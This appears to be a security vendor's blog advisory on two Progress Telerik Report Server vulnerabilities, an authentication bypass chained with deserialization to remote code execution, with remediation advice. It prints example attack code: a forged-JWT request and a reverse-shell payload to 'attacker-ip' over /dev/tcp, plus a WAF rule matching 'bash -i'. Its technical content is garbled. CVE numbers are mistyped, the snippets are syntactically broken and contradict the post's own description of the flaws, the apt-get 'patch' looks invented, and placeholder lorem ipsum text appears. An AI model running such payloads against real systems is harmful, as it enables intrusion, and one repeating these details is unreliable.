GET A DEMO

Voyager18 (research)

Fix CVE-2024-4358 & CVE-2024-180 in Telerik Report Server

CVE-2024-4358 and CVE-2024-1800 in Progress Telerik Report Server allow unauthorized access and remote code execution. Here's what we know.

Yair Divinsky | June 6, 2024

On May the 31st Sina Kheirkhah, a security researcher of the Summoning Team, posted the discovery of an exploit chain involving two vulnerabilities – CVE-2024-4358 and CVE-2024-1800 – in Progress Telerik Report Server, a report management solution.

These vulnerabilities present serious risks to organizations utilizing this software, with potential implications ranging from unauthorized access to remote code execution (RCE).

Here’s what we know:

TL;DR

Affected products: 

Progress Telerik Report Server 

Product category: 

Report Manager 

Severity: 

Critical – 9.9, 9.8 

Type: 

Authentication Bypass, Unauthorized Access to Remote Code Execution (RCE) 

Impact: 

Confidentiality (H), Integrity (H), Availability (H) 

PoC: 

Yes 

Exploit in the wild 

Yes

CISA Catalog 

No 

Remediation action 

Update to latest version of Progress Telerik Report Server 

MITRE advisory 

CVE-2024-4358 | CVE-2024-1800 

What is CVE-2024-4358?

CVE-2024-4358 is an authentication bypass vulnerability in the Progress Telerik Report Server. This flaw allows an attacker to bypass authentication mechanisms and gain unauthorized access to the application.

The vulnerability arises due to improper handling of authentication tokens, which can be manipulated by attackers to impersonate legitimate users without providing valid credentials. 

Kheirkhah and security researcher Soroush Dalili mention in Summoning Team’s blog, that the vulnerability is caused by flaws in the token validation process.

When a malicious token is crafted, the server incorrectly validates it, granting access without proper authentication. Here’s an illustrative snippet showing how the token manipulation might occur: 

import jwt 

 

# Crafting a malicious JWT token 

malicious_token = jwt.encode({'user': 'admin', 'exp': 9999999999}, 'secret_key', algorithm='HS256') #  

 

# Using the malicious token to bypass authentication 

headers = {'Authorization': f'Bearer {malicious_token}'} 

response = requests.get('https://victim-server/api/secure-endpoint', headers=headers)  

if response.status_code == 200: 

    print("Authentication bypass successful!") 

else: 

    print(”Failed to bypass authentication.") 

This exploit enables attackers to perform actions with administrative privileges, significantly compromising the security of the affected system. 

According to ZDI-24-561, the flaw exists due to a lack of validation of the current installation step in the Register method. The vulnerability has been assigned a CVSS score of 9.8 from both vendor and ZDI. 

CVE-2025-4358

 

What is CVE-2024-1800?

CVE-2024-1800 is a critical remote code execution (RCE) vulnerability in the Progress Telerik Report Server. This vulnerability allows an attacker to execute arbitrary code on the server, potentially taking full control of the system.

The issue stems from improper input validation, which can be exploited to inject and execute malicious code. 

SOCRadar reports that the vulnerability is due to insufficient sanitization of user inputs in certain API endpoints.

By sending a specially crafted request, an attacker can inject malicious commands into the system.

Below is an example demonstrating a basic payload that could be used to exploit this vulnerability:  

import jwt 

 

# Malicious payload to execute a reverse shell 

payload = { 

    'command: 'bash –i /dev/tcp/attacker-ip/4444 0>&1’ 

} 

 

# Sending the malicious request to the vulnerable endpoint 

response = requests.post('https://victim-server/api/execute-command, json=payload)  

if response.status_code == 200: 

    print("RCE successful!") 

else: 

    print(”Failed to execute RCE.") 

Successful exploitation of this vulnerability can lead to complete system compromise, allowing attackers to steal data, disrupt services, or further propagate malware within the network.

As noted last March by Censys, “An attacker with remote access and an ability to execute malicious code on such an asset may allow such an attacker to not only interfere with reporting functionality but also to better understand a victim’s network or gain further access leveraging the Active Directory integration. Such an attack can serve as a beachhead, or beginning, on a victim organization for attackers.” 

An advisory from Trend Micro’s Zero Day Initiative (ZDI) suggests that a low privileged user is required. After being able to identify an authentication bypass issue (CVE-2024-4358), Kheirkhah worked with Dalili to “complete the deserialization chain” to combine both flaws to achieve RCE. 

Insecure endpoint enables creation of admin users

According to Kheirkhah, a specific endpoint used for setting up the Progress Telerik Report Server lacks proper authentication.

This endpoint remains accessible to unauthenticated attackers even after the admin setup is complete, allowing attackers to bypass authentication and create a user with system administrator privileges on the server.

Chaining authentication bypass with insecure deserialization

By combining the authentication bypass flaw (CVE-2024-4358) with the insecure deserialization vulnerability (CVE-2024-1800), attackers can form an exploit chain.

This enables them to create a malicious report and execute arbitrary code on a vulnerable Progress Telerik Report Server.

Does CVE-2024-4358 affect me?

If you are using the Progress Telerik Report Server, CVE-2024-4358 likely affects you. The vulnerability is present in versions prior to the latest security update.

You can verify if your system is vulnerable by checking the version of your Telerik Report Server and ensuring it aligns with the versions mentioned in the advisories from Summoning Team and SOCRadar. 

 

Does CVE-2024-1800 affect me?

CVE-2024-1800 affects organizations running vulnerable versions of the Progress Telerik Report Server. Given the critical nature of this RCE vulnerability, it is imperative to ascertain whether your system is running an impacted version.

SOCRadar’s analysis provides detailed information on affected versions, which should be cross-referenced with your current deployment.

 

Has CVE-2024-4358 been actively exploited in the wild?

According to BleepingComputer, there have been active exploitations of CVE-2024-4358 in the wild. Attackers have leveraged this vulnerability to gain unauthorized access to vulnerable systems, emphasizing the need for immediate remediation.

Reports from various security researchers, including those at Summoning Team, corroborate the active exploitation, making it a critical issue for administrators to address.

 

Has CVE-2024-1800 been actively exploited in the wild? 

While there have been fewer reports on the active exploitation of CVE-2024-1800 compared to CVE-2024-4358, the potential for exploitation remains high.

 

How to fix CVE-2024-4358

Enterprise administrators should promptly upgrade their Telerik installations. While CVE-2024-1800 requires an update to be resolved, the risk posed by CVE-2024-4358 can be temporarily mitigated using a URL Rewrite technique as outlined in the advisory. 

Progress Software also recommends that administrators review the Report Server’s user list at ‘{host}/Users/Index’ for any unauthorized local users. 

As mentioned in Helpnetsecurity’s blog, vulnerabilities in Progress’ enterprise solutions have been targeted by attackers during the last years.

The MOVEit Transfer zero-day (CVE-2023-34362) was exploited by the Cl0p ransomware gang, impacting over 2,700 organizations. Late last year, critical vulnerabilities in WS_FTP Server were exploited shortly after PoC code was published. 

Patching

The most effective way to fix CVE-2024-4358 is to apply the latest security update provided by Progress Telerik. This update addresses the authentication bypass issue by enhancing the token validation mechanisms. 

Mitigation steps

  1. Ensure all instances of the Progress Telerik Report Server are updated to the latest version. 
  2. Monitor logs for any suspicious authentication attempts or anomalies. 
  3. Implement additional layers of security, such as multi-factor authentication (MFA), to further protect sensitive endpoints. 

Example patch implementation

# Example command to update Telerik Report Server 

sudo apt-get update 

sudo apt-get install telerik-report-server 

How to fix CVE-2024-1800

Patching

Apply the latest security patches from Progress Telerik that address the RCE vulnerability. These patches implement stricter input validation and sanitization to prevent code injection attacks. 

Mitigation steps 

  1. Regularly update and patch all software components. 
  2. Employ web application firewalls (WAF) to detect and block malicious payloads. 
  3. Conduct thorough code reviews and security assessments to identify and rectify vulnerabilities. 

Example patch implementation

# Example configuration to deploy a web application firewall (WAF) 

waf_config: 

  rules: 

    - name: block_malicious_payloads 

      condition:  

        contains: "bash -i" 

        action: "block" 

 

Next steps

Each new vulnerability is a reminder of where we stand and what we need to do better. Check out the following resources to help you maintain cyber hygiene and stay ahead of the threat actors: 

  1. Q1 2024 Vulnerability Watch
  2. The MITRE ATT&CK framework: Getting started
  3. The true impact of exploitable vulnerabilities for 2024
  4. Multi-cloud security challenges – a best practice guide
  5. How to properly tackle zero-day threats

Free for risk owners

Set up in minutes to aggregate and prioritize cyber risk across all your assets and attack vectors.

“The only free RBVM tool out there The only free RBVM tool lorem ipsum out there. The only”.

Name Namerson
Head of Cyber Security Strategy

strip-img-2.png